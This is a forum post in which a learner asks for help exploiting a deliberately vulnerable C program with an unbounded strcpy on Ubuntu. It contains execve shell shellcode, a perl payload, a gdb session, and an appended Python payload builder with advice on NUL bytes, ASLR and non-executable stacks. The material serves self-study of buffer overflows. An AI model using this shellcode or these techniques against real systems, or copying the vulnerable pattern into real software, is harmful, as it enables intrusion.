Name: Anonymous 2010-12-20 8:46
hey /prog/, I'm trying to learn about buffer overflows; I'm running Ubuntu. I was wondering whether I need to compile this simple program with any particular arguments, and whether I need to do anything to my OS, because I've heard GNU/Linux OSes come with buffer overflow protection by default.
I compiled the program like this:
gcc -fno-stack-protector abo1.c -o abo1
Here's the program.
#include <string.h>

int main(int argv, char **argc) {
    char buf[256];          /* 256-byte stack buffer */
    strcpy(buf, argc[1]);   /* unbounded copy of the first argument; overflows buf once it exceeds 255 bytes */
    return 0;
}
I've figured out how much garbage I need (I think).
buffer(256) - nops(150) = 106
buffer(106) - shellcode(43) = 63
buffer(63) + eip(4) = 67
garbage == 67
Exploit test code to find EIP:
perl -e 'print "A"x67, "\x90"x150, "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x08\x00\x00\x00\x2f\x62\x69\x6e\x2f\x73\x68\x00\x57\x53\x89\xe1\xcd\x80", "YYYY"'
Unless I did my maths wrong, I get this instead of a seg fault, so the EIP isn't overwritten.
$ gdb abo1 -q
(gdb) run perl -e 'print "A"x67, "\x90"x150, "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x08\x00\x00\x00\x2f\x62\x69\x6e\x2f\x73\x68\x00\x57\x53\x89\xe1\xcd\x80", "YYYY"'
Starting program: /home/test/abo1 perl -e 'print "A"x67, "\x90"x150, "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x08\x00\x00\x00\x2f\x62\x69\x6e\x2f\x73\x68\x00\x57\x53\x89\xe1\xcd\x80", "YYYY"'
Program exited with code 064.
(gdb)
ANY help would be appreciated, thanks.
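An added example, not code from the post above, that plays the role of the perl one-liner: it lays out padding + NOP sled + shellcode + saved EBP + return address for a buffer of a given size and then checks what strcpy() would actually copy, since strcpy() stops at the first 0x00 byte. It assumes a 32-bit x86 frame in which buf[256] sits directly below the saved EBP and the return address with no compiler alignment padding in between; the shellcode bytes are the ones quoted in the post, and the 0xcc stand-in used for the second check is constructed for the example and is not working shellcode.

```python
# Added example (not the original poster's code).
# Assumed frame: 32-bit x86, buf directly below saved EBP and saved EIP,
# no alignment padding between the buffer and the saved registers.
import struct

# The 43-byte execve("/bin/sh") shellcode quoted in the post.
SHELLCODE = (
    b"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7"
    b"\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3"
    b"\x52\xe8\x08\x00\x00\x00\x2f\x62\x69\x6e\x2f\x73\x68\x00"
    b"\x57\x53\x89\xe1\xcd\x80"
)


def build_payload(buf_size, nop_count, shellcode, ret_addr, ebp_filler=b"BBBB"):
    """Return padding + NOP sled + shellcode + saved-EBP filler + return address.

    The padding, sled and shellcode fill the buffer exactly; the two 4-byte
    words that follow overwrite the saved EBP and then the saved EIP.
    """
    padding = buf_size - nop_count - len(shellcode)
    if padding < 0:
        raise ValueError("NOP sled plus shellcode do not fit in the buffer")
    if len(ebp_filler) != 4:
        raise ValueError("saved EBP filler must be 4 bytes on 32-bit x86")
    return (b"A" * padding
            + b"\x90" * nop_count
            + shellcode
            + ebp_filler
            + struct.pack("<I", ret_addr))   # little-endian, as it lands on the stack


def ret_offset(buf_size):
    """Offset into the payload at which the saved return address begins."""
    return buf_size + 4          # buffer, then 4 bytes of saved EBP


def first_nul(payload):
    """Index of the first 0x00 byte, or -1 if there is none."""
    return payload.find(b"\x00")


def as_strcpy_copies(payload):
    """The bytes strcpy() actually copies: everything before the first NUL."""
    nul = first_nul(payload)
    return payload if nul < 0 else payload[:nul]


def reaches_return_address(payload, buf_size):
    """True if the bytes strcpy() copies cover all 4 bytes of the saved EIP."""
    return len(as_strcpy_copies(payload)) >= ret_offset(buf_size) + 4


if __name__ == "__main__":
    # The post's numbers: 256-byte buffer, 150 NOPs, 43-byte shellcode, "YYYY" as EIP.
    p = build_payload(256, 150, SHELLCODE, 0x59595959)
    print("payload length:", len(p), "return address at offset", ret_offset(256))
    print("first NUL at byte", first_nul(p),
          "-> reaches EIP:", reaches_return_address(p, 256))
    # Same layout with a NUL-free stand-in (int3 bytes, constructed; not real shellcode).
    q = build_payload(256, 150, b"\xcc" * len(SHELLCODE), 0x59595959)
    print("NUL-free stand-in reaches EIP:", reaches_return_address(q, 256))
```

With the post's numbers this produces a 264-byte string with the return address at offset 260, the same place the post's 67 bytes of "garbage" put YYYY (the padding is just split here into 63 bytes before the sled plus 4 bytes over the saved EBP). The check is the part worth having: this shellcode contains 0x00 bytes, so strcpy() stops copying at byte 228, short of the end of the buffer, and an argv entry cannot carry a NUL at all, so a NUL-free encoding of the shellcode is needed before the copy can reach EIP. Separately, gdb's run hands its argument string to a shell, so the perl one-liner has to be written as run $(perl -e '...') for its output to become argv[1]; written bare, argv[1] is the literal word perl. Beyond -fno-stack-protector, an Ubuntu box also applies ASLR (/proc/sys/kernel/randomize_va_space) and a non-executable stack (gcc -z execstack marks the binary as needing an executable one), both of which have to be dealt with before a NOP-sled payload can run.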